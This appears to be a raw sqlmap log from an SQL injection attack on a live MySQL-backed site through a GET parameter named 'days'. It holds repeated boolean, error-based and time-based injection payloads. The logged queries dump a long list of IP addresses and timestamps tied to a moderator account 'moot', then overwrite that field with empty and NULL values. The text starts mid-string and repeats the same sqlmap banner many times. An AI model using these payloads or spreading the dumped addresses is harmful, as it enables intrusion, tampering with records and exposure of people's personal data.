":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397928923,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
update mod_users set ips='' where username='moot': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips from mod_users where username='moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
update mod_users set ips=NULL where username='moot': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips from mod_users where username='moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select sum(length(ips)) from user_mods where username='moot' [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select char_length(ips)) from user_mods where username='moot' [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select char_length(ips) from user_mods where username='moot' [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
update mod_users set ips='' where username='moot': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
